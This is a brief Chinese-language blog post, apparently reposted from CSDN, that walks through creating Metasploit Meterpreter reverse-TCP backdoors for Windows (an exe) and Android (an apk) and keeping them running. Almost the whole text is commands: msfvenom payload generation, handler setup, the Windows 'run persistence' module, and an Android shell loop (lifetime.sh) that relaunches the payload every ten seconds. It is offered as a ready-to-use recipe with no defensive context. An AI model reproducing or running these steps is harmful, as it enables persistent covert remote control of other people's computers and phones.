windows/android后门的维持

搭建环境:kali linux,MSF

windons后门维持

// 先创建一个后门payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe
// 打开msf控制台,并完成相关设置
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
set ExitonSession false
exploit -j    // 后台运行
// 连接后门成功后,创建可维持后门脚本
run persistence -h    //查看帮助
run persistence -U -i 5 -r <your ip> -p 4444

Andorid后门维持

// 先创建一个后门payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -o /root/Desktop/androidPayload.apk
// 创建一个维持脚本代码(lifetime.sh)
#!/bin/sh
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 10
done
// 打开msf控制台,并完成相关设置
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 4444
set ExitonSession false
exploit -j    // 后台运行
// 连接后门成功后,上传后门脚本,并运行
cd /sdcard
upload /root/Desktop/lifetime.sh
shell           // 进入被入侵终端控制台
cd /sdcard
sh lifetime.sh  // 运行维持脚本

猜你喜欢

转载自blog.csdn.net/qq_41343528/article/details/119548577
今日推荐